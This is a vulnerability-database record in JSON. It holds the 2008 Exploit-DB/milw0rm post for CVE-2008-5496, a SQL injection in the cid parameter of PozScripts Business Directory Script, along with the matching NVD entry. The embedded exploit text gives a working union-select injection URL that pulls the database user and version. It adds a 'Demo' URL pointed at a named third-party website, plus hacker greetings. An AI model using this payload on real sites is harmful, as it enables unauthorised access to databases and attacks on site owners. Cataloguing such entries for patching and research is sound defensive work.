{"id": "EDB-ID:7098", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PozScripts Business Directory Script cid Remote SQL Injection Vuln", "description": "PozScripts Business Directory Script (cid) Remote SQL Injection Vuln. CVE-2008-5496. Webapps exploit for php platform", "published": "2008-11-11T00:00:00", "modified": "2008-11-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7098/", "reporter": "Hussin X", "references": [], "cvelist": ["CVE-2008-5496"], "lastseen": "2016-02-01T01:24:28", "viewCount": 5, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-02-01T01:24:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5496"]}], "modified": "2016-02-01T01:24:28", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/7098/", "sourceData": "|___________________________________________________\n|\n| Business Directory Script ( cid) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|-------------------- Hussin X -------------------\n|\n| Author: Hussin X\n|\n| Home : WwW.IQ-ty.CoM\n|\n| email: darkangel_g85[at]Yahoo[DoT]com\n|\n|___________________________________________________\n|\n| script : http://www.pozscripts.com/product_details.php?item_id=6\n|\n| DorK : :) \n|___________________________________________________\n\nExploit:\n________\n\n\n\nwww.[target].com/Script/showcategory.php?cid=-264+union+select+1,concat(user(),0x3e,version()),3,4,5--\n\n\n\nDemo\n________\n\nhttp://www.singwebs.com/businessdirectoryadmindemo/showcategory.php?cid=-264+union+select+1,concat(user\n\n(),0x3e,version()),3,4,5--\n\n\n\n\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr\n|\n| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K\n|_____________________________________________________________________\n\n\n Im IRAQi | Im TrYaGi\n\n# milw0rm.com [2008-11-11]\n", "osvdbidlist": ["49822"]}

{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in showcategory.php in PozScripts Business Directory Script allows remote attackers to execute arbitrary SQL commands via the cid parameter.", "edition": 3, "cvss3": {}, "published": "2008-12-12T16:30:00", "title": "CVE-2008-5496", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5496"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:pozscripts:business_directory_script:*"], "id": "CVE-2008-5496", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5496", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pozscripts:business_directory_script:*:*:*:*:*:*:*:*"]}]}